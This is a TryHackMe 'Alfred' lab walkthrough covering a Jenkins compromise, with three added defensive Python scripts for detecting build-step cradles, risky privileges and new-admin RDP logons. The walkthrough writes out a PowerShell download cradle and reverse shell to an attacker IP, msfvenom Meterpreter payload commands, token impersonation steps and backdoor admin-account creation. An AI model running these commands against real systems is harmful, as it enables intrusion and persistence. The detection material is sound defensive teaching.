ALFRED – TRYHACKME – WALKTHROUGH

– Introduction
– Scanning & Enumeration
– Vulnerability Scanning
– Exploitation
– Privilege Escalation
– Post Exploitation – RDP
– Parting Thoughts
– Additional Resources

Tools Used: KALI, NMAP

Attacker IP: 10.6.10.8
Victim IP: 10.10.25.210

Open Ports:
(80) – HTTP Webserver
(8080) – HTTP Webserver
(3389) – RDP – Remote Desktop

Server: Microsoft IIS httpd 7.5

Introduction

I’ve decided that to practice my pentest skills it would be helpful if I created some walkthroughs to help me practice. This is my first walkthrough and I hope to make many more. Jenkins is a self-contained, open-source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software. Our mission is to exploit Jenkins to gain an initial shell, then escalate our privileges by exploiting Windows authentication tokens. There are 2 flags on this box, user and root.

Source Link: Try Hack Me Room Alfred

Scanning & Enumeration

We will start by scanning the box using nmap. We know that the box doesn’t respond to ping requests, so we must use the -Pn flag. The scan returns 3 open ports: 80, 8080 and 3389. Looking at the page source on port 80 there is no new information and robots.txt doesn’t exist, so we move on to port 8080 and notice that there is a login page. A quick Google search shows that there are default credentials for Jenkins. admin:password didn’t work but admin:admin did. We are now able to log in to Jenkins.

nmap -sV -A -Pn 10.10.25.210

Alfred TryHackMe Ping Scan

Enumeration

We know the version information for port 8080 is Jetty 9.4.z; searchsploit did not reveal any exploits. Jenkins is running version 2.190.1, which didn’t return any exploits either. Let’s look at creating a project, as we can see that we have the option to Execute Windows batch commands. TryHackMe suggests using Nishang to get the initial shell.

Exploitation


Task 1 – Initial Access

First we will need the Nishang PowerShell reverse shell scripts. You can download them from the Nishang repository; we will be using the Invoke-PowerShellTcp.ps1 reverse script. The idea here is that we will start an HTTP server on our attacker machine so that the batch script on the victim can download the script from it. Port 9001 is the netcat listener where we will catch our shell.

Steps:

  1. Download the Script
  2. Host the Script
  3. Start NC listener port 9001
  4. Build in Jenkins
  5. Get User Flag

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

python3 -m http.server

nc -lvnp 9001

powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.10.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.6.10.8 -Port 9001
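From the defender’s side, the interesting artefact in Task 1 is that the whole attack is a Jenkins build step: the cradle ends up stored in the job’s config.xml, where it can be audited. The following is an added example (not code from the post or from Jenkins) that parses freestyle job config.xml files, pulls the command text out of "Execute Windows batch command" (hudson.tasks.BatchFile) and "Execute shell" (hudson.tasks.Shell) steps, and flags commands that match download-cradle and reverse-shell indicators. The indicator names and regexes are assumptions built from the command above, and the sample config.xml is constructed; Python is used here because it is an analysis script rather than something typed into the target.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Indicator patterns for a PowerShell download cradle or reverse-shell launch inside a
# build step. The names and regexes are assumptions for this example, built from the
# command shown in Task 1 and common variants of it.
CRADLE_PATTERNS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcertutil\b", re.I),
    "inline_eval": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "reverse_shell": re.compile(r"Invoke-PowerShellTcp|-Reverse\b|\breverse\.exe\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I),
}

# Jenkins freestyle jobs store "Execute Windows batch command" steps as
# hudson.tasks.BatchFile/command and "Execute shell" steps as hudson.tasks.Shell/command
# in the job's config.xml.
STEP_TAGS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")


def extract_build_commands(config_xml: str) -> List[str]:
    """Return the command text of every batch/shell build step in a job config.xml."""
    root = ET.fromstring(config_xml)
    commands = []
    for tag in STEP_TAGS:
        for step in root.iter(tag):
            command = (step.findtext("command") or "").strip()
            if command:
                commands.append(command)
    return commands


def audit_build_commands(config_xml: str) -> List[Dict[str, object]]:
    """Flag build steps that match any cradle/reverse-shell indicator."""
    findings = []
    for command in extract_build_commands(config_xml):
        hits = sorted(name for name, rx in CRADLE_PATTERNS.items() if rx.search(command))
        if hits:
            findings.append({"command": command, "indicators": hits})
    return findings


# Constructed sample config.xml: one step mirroring the Task 1 cradle, one benign step.
SAMPLE_CONFIG = """<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.10.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.6.10.8 -Port 9001</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>msbuild app.sln /p:Configuration=Release</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>
"""

if __name__ == "__main__":
    for finding in audit_build_commands(SAMPLE_CONFIG):
        print(", ".join(finding["indicators"]), "->", finding["command"][:70])
```

Run it over every `jobs/*/config.xml` under JENKINS_HOME (or over job configuration change history) and the Task 1 step lights up on all four indicators while the normal build step is silent. The real fix is upstream of detection: no default admin:admin credentials, and build-step execution restricted to accounts that actually need it.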

Task 2 – Upgrade Shell

Create payload with msfvenom and upgrade to meterpreter shell. Steps to follow:

  1. Create msfvenom payload
  2. Set up multi/handler
  3. Download reverse shell to target
  4. Start Process

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.10.8 LPORT=9002 -f exe -o reverse.exe

Set up multi/handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.6.10.8
set LPORT 9002
run

Download revshell to target:

powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.6.10.8:8000/reverse.exe','reverse.exe')"

Start process with:

Start-Process "reverse.exe"

Privilege Escalation (Privesc) – Task 3

We check the privileges user alfred has enabled and will exploit the SeImpersonatePrivilege with the help of incognito.

Steps:

  1. Load incognito
  2. List tokens
  3. Impersonate Admin
  4. Migrate Service
  5. Get Root Flag

whoami /priv

Exit the shell back to meterpreter:

load incognito

list_tokens -g

impersonate_token "BUILTIN\Administrators"

getuid

ps

migrate 668
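The privesc works because the account Jenkins runs as holds SeImpersonatePrivilege, which is the thing to audit on every build server. The following is an added example, not code from the post, that parses the output of `whoami /priv` (as captured from a service account) and reports privileges that give a foothold a path to SYSTEM. The list of escalation privileges and their one-line impacts are my assumptions for this example; the sample output is constructed to match the shape of a real `whoami /priv` listing.

```python
import re
from typing import Dict, List

# Privileges that let a low-privileged service account escalate. The list is an
# assumption for this example: SeImpersonatePrivilege is the one abused with incognito
# above; the others are comparable in impact.
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate tokens of clients that connect to the process",
    "SeAssignPrimaryTokenPrivilege": "replace the primary token of a new process",
    "SeDebugPrivilege": "open and read/write any process, including LSASS",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# One data row of `whoami /priv`: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def find_escalation_paths(output: str) -> List[Dict[str, str]]:
    """Report held privileges that enable escalation.

    'Disabled' only means the privilege is not currently enabled in the token; the
    process can enable it itself, so both states are reported as findings."""
    findings = []
    for name, state in parse_whoami_priv(output).items():
        if name in ESCALATION_PRIVS:
            findings.append({"privilege": name, "state": state, "impact": ESCALATION_PRIVS[name]})
    return findings


# Constructed sample output in the layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
"""

if __name__ == "__main__":
    for finding in find_escalation_paths(SAMPLE_WHOAMI_PRIV):
        print(f"{finding['privilege']} ({finding['state']}): {finding['impact']}")
```

The mitigation this points at is to run the Jenkins service (and its build agents) as a dedicated low-privilege account without SeImpersonatePrivilege, rather than as a local service or administrator account, so that a build-step compromise stays a build-step compromise.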

Post Exploitation

Create a user and RDP into the box. Steps:

  1. Create New User
  2. Add New User to Administrators group
  3. Log into RDP with the new credentials

net user jakestpeter Password123! /add
net localgroup "administrators" jakestpeter /add
remmina
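The post-exploitation steps leave a very recognisable trail in the Windows Security log: a 4720 (account created), a 4732 (member added to a local group) for Administrators, and then a 4624 logon with logon type 10 (RemoteInteractive, i.e. RDP) for the brand-new account. The following is an added example, not code from the post, that correlates those three events for the same account inside a time window and raises one alert per chain. The event records are constructed (the event IDs and logon type are the real Windows values; the field names are simplified and the timestamps and names are made up).

```python
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample Security-log records. 4720 = user account created, 4732 = member
# added to a security-enabled local group, 4624 = logon (type 10 = RemoteInteractive/RDP).
# Field names are simplified here; a real pipeline would map them from the event XML.
SAMPLE_EVENTS = [
    {"time": "2021-03-01T10:02:11", "id": 4624, "user": "alfred", "logon_type": 3},
    {"time": "2021-03-01T10:05:40", "id": 4720, "user": "jakestpeter", "actor": "alfred"},
    {"time": "2021-03-01T10:05:52", "id": 4732, "user": "jakestpeter", "group": "Administrators", "actor": "alfred"},
    {"time": "2021-03-01T10:08:03", "id": 4624, "user": "jakestpeter", "logon_type": 10},
    {"time": "2021-03-02T09:00:00", "id": 4720, "user": "svc_build", "actor": "itadmin"},
]

DEFAULT_WINDOW = timedelta(hours=1)


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def _first(events: List[Dict], event_id: int, user: str, t0: datetime,
           window: timedelta, **extra) -> Optional[Dict]:
    """First event of `event_id` for `user` within [t0, t0 + window] whose fields match `extra`."""
    for e in sorted(events, key=_ts):
        if e["id"] != event_id or e["user"] != user or not (t0 <= _ts(e) <= t0 + window):
            continue
        if all(str(e.get(k, "")).lower() == str(v).lower() for k, v in extra.items()):
            return e
    return None


def correlate_new_admin_rdp(events: List[Dict], window: timedelta = DEFAULT_WINDOW) -> List[Dict]:
    """Chain 4720 -> 4732 (Administrators) -> 4624 type 10 for the same new account.

    Created + added to Administrators is 'medium'; a following RDP logon raises it to
    'high'. An account creation on its own is routine admin work and is not alerted on."""
    alerts = []
    for created in (e for e in events if e["id"] == 4720):
        name, t0 = created["user"], _ts(created)
        admin_add = _first(events, 4732, name, t0, window, group="Administrators")
        if admin_add is None:
            continue
        rdp = _first(events, 4624, name, t0, window, logon_type=10)
        alerts.append({
            "account": name,
            "created_by": created.get("actor"),
            "severity": "high" if rdp else "medium",
            "rdp_logon_at": rdp["time"] if rdp else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate_new_admin_rdp(SAMPLE_EVENTS):
        print(alert)
```

Against the sample data the jakestpeter chain comes out as a single high-severity alert attributed to the account that created it, while the routine svc_build creation produces nothing. On a real box the actor in the 4720 would be the Jenkins service account, which is itself a strong signal: a CI service account has no business creating local administrators.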

Parting Thoughts

I had a great time working on the Alfred box. I figured that the more I practiced the better I’d become so I decided that writing these walkthroughs will help me practice the concepts. Feel free to comment with any questions or problems you may be running into. Happy Hacking!

Supplemental Resources – Videos